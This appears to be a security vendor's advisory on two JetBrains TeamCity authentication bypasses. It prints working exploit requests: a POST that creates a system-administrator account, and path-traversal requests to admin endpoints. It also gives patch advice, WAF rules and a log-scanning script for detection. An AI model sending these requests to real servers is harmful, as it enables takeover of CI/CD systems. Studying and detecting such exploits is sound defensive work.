[2024.04 Vulnerability Report] JetBrains TeamCity Authentication Bypass Vulnerability | Cloud-Based Platform AIONCLOUD




1. Overview

TeamCity is JetBrains' build management and continuous integration server. This article summarizes our analysis of CVE-2024-27198 and CVE-2024-27199, two authentication bypass vulnerabilities recently discovered in the product.

[Image omitted] Source: https://www.helpnetsecurity.com/2024/03/21/exploiting-cve-2024-27198/


2. Attack Type

In March 2024, JetBrains released patches for CVE-2024-27198 and CVE-2024-27199 in TeamCity, and Rapid7 published an analysis of both vulnerabilities.

2-1. CVE-2024-27198

TeamCity's HTTP web server, which listens on port 8111, allows endpoints that require authentication to be reached without authenticating when a request with a crafted URI is routed through a specific request-handling class.

To use this vulnerability to reach an authentication-required endpoint, the following conditions must be met:

  • Request a URL that does not exist on the server. In most PoCs this is done by requesting a /hax URL.

  • Specify the endpoint you actually want to access in the jsp= query parameter.

  • Write the request so that the URL ends in ;.jsp.

POST /hax?jsp=/app/rest/users.jsp HTTP/1.1
Content-Length: 177
Content-Type: application/json
Host: 172.29.228.65:8111
User-Agent: HTTPie

{
  "username": "haxor",
  "password": "haxor",
  "email": "haxor",
  "roles": {
    "role": [
      {
        "roleId": "SYSTEM_ADMIN",
        "scope": "g"
      }
    ]
  }
}

2-2. CVE-2024-27199

Some endpoints on the TeamCity HTTP web server do not require authentication, and the path traversal sequence ../ can be used from them to reach endpoints that do require authentication, allowing system settings to be modified or sensitive information to be read.

The following endpoints can be used as the starting point because they do not require authentication:

  • /res/
  • /update/
  • /.well-known/acme-challenge/

Authenticated endpoints that are commonly reached from those paths with the ../ sequence include:

  • /app/availableRunners
  • /app/https/settings/setPort
  • /app/https/settings/certificateInfo
  • /app/https/settings/defaultHttpsPort
  • /app/https/settings/fetchFromAcme
  • /app/https/settings/removeCertificate
  • /app/https/settings/uploadCertificate
  • /app/https/settings/termsOfService
  • /app/https/settings/triggerAcmeChallenge
  • /app/https/settings/cancelAcmeChallenge
  • /app/https/settings/getAcmeOrder
  • /app/https/settings/setRedirectStrategy
  • /app/pipeline
  • /app/oauth/space/createBuild.html

Example request:

GET /res/../admin/diagnostic.jsp HTTP/1.1
Host: 172.29.228.65:8111
User-Agent: HTTPie

3. Countermeasures

JetBrains has released patches for both vulnerabilities, so the fix is to update the TeamCity On-Premises server to version 2023.11.4 or later.

In our AIWAF product, CVE-2024-27198 is detected by the "2186: TeamCity Authentication Bypass" pattern included in the March 2024 pattern update, and CVE-2024-27199 is already detected by the existing "Directory Access Detection" policy.
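As an added illustration of the two detection rules described above (this is example code, not part of the original report or of AIWAF), the following scans constructed access-log lines for the request shapes the report describes: a jsp= parameter with a request target ending in .jsp (CVE-2024-27198), and a ../ segment under one of the unauthenticated prefixes (CVE-2024-27199). The log lines, IP address and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Prefixes the report lists as reachable without authentication (CVE-2024-27199).
UNAUTH_PREFIXES = ("/res/", "/update/", "/.well-known/acme-challenge/")

# Request line inside a common/combined access-log entry, e.g. "GET /x HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_target(target: str) -> list:
    """Return the names of the rules matched by one request-target string."""
    decoded = unquote(target)            # so that /res/%2e%2e/ is seen as /res/../
    url = urlsplit(decoded)
    hits = []
    # CVE-2024-27198: a jsp= query parameter naming the real endpoint, with the
    # whole request-target ending in .jsp (the PoCs use ';.jsp' as a path parameter).
    params = parse_qs(url.query, keep_blank_values=True)
    if decoded.endswith(".jsp") and any(v.startswith("/") for v in params.get("jsp", [])):
        hits.append("CVE-2024-27198 auth bypass")
    # CVE-2024-27199: a '..' segment under a prefix that needs no authentication.
    if url.path.startswith(UNAUTH_PREFIXES) and ".." in url.path.split("/"):
        hits.append("CVE-2024-27199 path traversal")
    return hits


def scan_log(lines) -> list:
    """Return (line_number, rules) for every log line that matches at least one rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            rules = classify_target(m.group("target"))
            if rules:
                findings.append((n, rules))
    return findings


# Constructed sample entries; the client IP and timestamps are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2024:10:00:00 +0000] "GET /login.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Apr/2024:10:00:01 +0000] "POST /hax?jsp=/app/rest/users;.jsp HTTP/1.1" 200 310',
    '10.0.0.5 - - [01/Apr/2024:10:00:02 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9001',
    '10.0.0.5 - - [01/Apr/2024:10:00:03 +0000] "GET /res/%2e%2e/app/https/settings/setPort HTTP/1.1" 200 120',
    '10.0.0.5 - - [01/Apr/2024:10:00:04 +0000] "GET /res/img/logo.png HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for n, rules in scan_log(SAMPLE_LOG):
        print(n, rules)
```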


4. Conclusion

These vulnerabilities in JetBrains TeamCity, a CI/CD product used by many organizations, are easy to exploit, so affected servers should be updated to the latest version as soon as possible.

Our AIWAF product has patterns for vulnerabilities in JetBrains TeamCity and other products, and we will continue to respond quickly to related vulnerabilities as they are discovered.


5. References
